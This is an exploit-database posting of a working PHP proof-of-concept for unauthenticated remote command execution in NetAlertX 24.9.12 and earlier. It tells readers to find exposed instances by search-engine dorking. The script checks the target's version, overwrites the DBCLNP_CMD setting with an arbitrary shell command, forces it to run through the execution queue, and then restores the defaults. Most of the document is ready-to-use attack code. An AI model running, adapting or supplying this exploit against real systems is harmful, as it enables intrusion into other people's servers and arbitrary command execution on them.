## https://sploitus.com/exploit?id=PACKETSTORM:189474
=============================================================================================================================================
| # Title : NetAlertX 24.9.12 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 135.0.1 (64-bit) |
| # Vendor : https://netalertx.com/ |
=============================================================================================================================================
POC :
[+] Find exposed instances by dorking in Google or another search engine.
[+] An RCE (Remote Command Execution) exploit targeting NetAlertX: the `savesettings` function of `/php/server/util.php` accepts requests without authentication, so an attacker can overwrite the `DBCLNP_CMD` setting with an arbitrary shell command that the backend later executes, leading to command execution on the host.
[+] save code as poc.php .
[+] Usage : from a command prompt run `php poc.php` (the author's example: `c:\www\test\php poc.php`).
[+] Set the target : edit the `$target = "192.168.1.100";` line near the end of the script.
[+] PayLoad :
<?php
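class NetAlertXExploit {
    /** @var string Host name or IP address of the NetAlertX instance. */
    private $target;
    /** @var int TCP port of the NetAlertX web UI. */
    private $port;
    /** @var int Seconds to sleep between saving the settings and queueing the plugin run. */
    private $waitTime;
    /** @var bool When false, cleanup() is a no-op and the injected command is left in place. */
    private $cleanup;
    /** @var string "http://host:port", prefix for every request. */
    private $baseUrl;
    /** @var int Per-request socket timeout in seconds. */
    private $timeout;

    /**
     * @param string $target   Host name or IP of the NetAlertX instance.
     * @param int    $port     Web UI port (NetAlertX listens on 20211 by default).
     * @param int    $waitTime Seconds to wait after the settings update before queueing the run.
     * @param bool   $cleanup  Whether cleanup() restores the original DBCLNP settings.
     * @param int    $timeout  Socket timeout for each HTTP request. Without it the stream
     *                         wrapper blocks indefinitely on a host that accepts the TCP
     *                         connection but never answers, and the script hangs.
     */
    public function __construct(string $target, int $port = 20211, int $waitTime = 75, bool $cleanup = true, int $timeout = 30) {
        $this->target = $target;
        $this->port = $port;
        $this->waitTime = $waitTime;
        $this->cleanup = $cleanup;
        $this->timeout = $timeout;
        $this->baseUrl = "http://$target:$port";
    }

    /**
     * Send one HTTP request to the target and return the raw response body.
     *
     * ignore_errors is set, so 4xx/5xx bodies are returned as strings; a false (or
     * empty) return therefore means the connection itself failed or timed out, not
     * that the server rejected the request. No credentials are attached on purpose:
     * the endpoints used here are reachable without authentication.
     *
     * @param string     $method HTTP method, e.g. "GET" or "POST".
     * @param string     $uri    Path relative to the base URL, leading slash included.
     * @param mixed|null $data   Optional body; when truthy it is JSON-encoded and sent.
     * @return string|false Response body, or false when the request could not be sent.
     */
    private function sendRequest(string $method, string $uri, $data = null) {
        $url = "{$this->baseUrl}$uri";
        $options = [
            'http' => [
                'method' => $method,
                'header' => "Content-Type: application/json\r\n",
                'ignore_errors' => true,
                'timeout' => $this->timeout,
            ],
        ];
        if ($data) {
            $options['http']['content'] = json_encode($data);
        }
        return file_get_contents($url, false, stream_context_create($options));
    }

    /**
     * Fetch /maintenance.php and decide from the advertised version whether the
     * target is in the affected range (23.01.14 .. 24.9.12 inclusive).
     *
     * @return bool True when the version string falls inside the affected range.
     */
    public function check(): bool {
        echo "[*] Checking if target is vulnerable...\n";
        $res = $this->sendRequest("GET", "/maintenance.php");
        if (!$res) {
            echo "[-] Target is not reachable.\n";
            return false;
        }
        // The maintenance page prints "Installed version ..."; grab the dotted number after it.
        if (!preg_match('/Installed version.*?([\d.]+)/', $res, $matches)) {
            echo "[-] Failed to detect version.\n";
            return false;
        }
        // [\d.]+ also swallows a sentence-ending period ("24.9.12."), which would skew
        // version_compare; strip surrounding dots and reject an all-dot match.
        $version = trim($matches[1], '.');
        if ($version === '') {
            echo "[-] Failed to detect version.\n";
            return false;
        }
        if (version_compare($version, "23.01.14", ">=") && version_compare($version, "24.9.12", "<=")) {
            echo "[+] Vulnerable version detected: $version\n";
            return true;
        }
        echo "[-] Target is not vulnerable (Version: $version).\n";
        return false;
    }

    /**
     * Overwrite DBCLNP_CMD with a shell wrapper around $cmd, wait for the backend to
     * pick the new setting up, then queue a plugin run and a backend restart.
     *
     * NOTE(review): $cmd is interpolated into a double-quoted shell string. A command
     * containing double quotes, `$` or backticks will be mangled; keep it simple or
     * escape those characters yourself before calling.
     *
     * @param string $cmd Shell command to run on the target.
     */
    public function exploit(string $cmd): void {
        echo "[*] Exploiting target...\n";
        $payload = "/bin/sh -c \"$cmd\"";
        // "*" becomes the cron spec "* * * * *" (every minute) in updateSettings().
        $this->updateSettings($payload, "*");
        echo "[*] Waiting for settings update...\n";
        sleep($this->waitTime);
        echo "[*] Adding payload to execution queue...\n";
        $this->addToExecutionQueue("run|DBCLNP");
        $this->addToExecutionQueue("cron_restart_backend");
        echo "[+] Payload sent successfully!\n";
    }

    /**
     * POST the unauthenticated "savesettings" call that sets DBCLNP to run on a
     * schedule, with $cmd as its command and "$schedule * * * *" as its cron spec.
     *
     * Terminates the script (die) when the request cannot be sent.
     *
     * @param string $cmd      Value written to DBCLNP_CMD.
     * @param string $schedule Minute field of the cron spec written to DBCLNP_RUN_SCHD.
     */
    private function updateSettings(string $cmd, string $schedule): void {
        $data = [
            'function' => 'savesettings',
            'settings' => [
                ['DBCLNP', 'DBCLNP_RUN', 'string', 'schedule'],
                ['DBCLNP', 'DBCLNP_CMD', 'string', $cmd],
                ['DBCLNP', 'DBCLNP_RUN_SCHD', 'string', "$schedule * * * *"],
            ],
        ];
        $res = $this->sendRequest("POST", "/php/server/util.php", $data);
        if (!$res) {
            die("[-] Failed to update settings.\n");
        }
        echo "[+] DBCLNP_CMD updated to '$cmd'.\n";
    }

    /**
     * POST an "addToExecutionQueue" action, prefixed with a unique id so repeated
     * actions are not deduplicated by the target.
     *
     * Terminates the script (die) when the request cannot be sent.
     *
     * @param string $cmd Queue action, e.g. "run|DBCLNP" or "cron_restart_backend".
     */
    private function addToExecutionQueue(string $cmd): void {
        $data = [
            'function' => 'addToExecutionQueue',
            'action' => uniqid() . "|$cmd",
        ];
        $res = $this->sendRequest("POST", "/php/server/util.php", $data);
        if (!$res) {
            die("[-] Failed to add payload to execution queue.\n");
        }
    }

    /**
     * Put DBCLNP_CMD and its schedule back to what the PoC author reports as the
     * stock values (every 30 minutes). Verify against the target's own config before
     * relying on this; it is a no-op when the instance was built with $cleanup=false.
     */
    public function cleanup(): void {
        if (!$this->cleanup) {
            return;
        }
        echo "[*] Restoring original settings...\n";
        $defaultCmd = 'python3 /app/front/plugins/db_cleanup/script.py pluginskeephistory={pluginskeephistory} hourstokeepnewdevice={hourstokeepnewdevice} daystokeepevents={daystokeepevents} pholuskeepdays={pholuskeepdays}';
        $this->updateSettings($defaultCmd, "*/30");
        echo "[+] Cleanup completed.\n";
    }
}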
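// Usage: pass the target host as the first CLI argument (`php poc.php 192.168.1.100`),
// or edit the hard-coded fallback below.
$target = $argv[1] ?? "192.168.1.100";
$exploit = new NetAlertXExploit($target);
// Only fire the payload when the version check passed. cleanup() then puts the
// DBCLNP command and schedule back, since exploit() sets the schedule to every minute.
if ($exploit->check()) {
    $exploit->exploit("id");
    $exploit->cleanup();
}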
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================